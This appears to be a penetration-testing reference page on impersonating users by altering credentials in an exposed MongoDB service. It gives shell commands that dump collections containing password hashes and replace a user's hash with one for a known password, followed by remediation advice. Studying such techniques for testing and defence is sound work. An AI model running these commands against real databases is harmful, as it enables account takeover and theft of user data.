MongoDB - Impersonation via credentials change
Having access to a MongoDB service, it could be possible to change sensitive information for users in a database, for example, change the credentials used in a website, such as a login page. Here we found an explanation of this process:
mongo --port $serviceportSearch for database names on the system and connect to the desired one. Then look for the collections inside it, select one considered important, and retrieve sensitive information
use $database;
show collections;
db.$chosenCollection.find(); #For example, db.admin.find();
#Example output
{"id": ObjectID("...id..."), "name": "...name...", "email": "...email...", "x_shadow": "...hash...",
...Check the password hash, create a new one for a known value using the same encryption/hashing, and update it in the database. Then use the changed credentials to impersonate the user
db.admin.update({ "name": "...name..." }, { $set: { "x_shadow": "$6$9Ter1EZ9$4RCTnLfeDJsdAQ16M5d1d5Ztg2CE1J2IDlbAPSUcqYOoxjEEcpMQag41dtCQv2cJ.n9kvlx46hNT78dngJBVt0" # Example generated hash for Ch4ngeM3VeryQu!ck in SHA512
...Remediation Actions
Use Role-Based Access Control (RBAC) to avoid modification of values by unauthorized users
Avoid giving the root, userAdmin, or dbAdmin roles to accounts used by applications
Enforce strong passwords for all users
Enable auditing for actions on sensitive collections
Hash passwords in the application layer using modern techniques like bcrypt or Argon2, and use salt and pepper for hashes
Last updated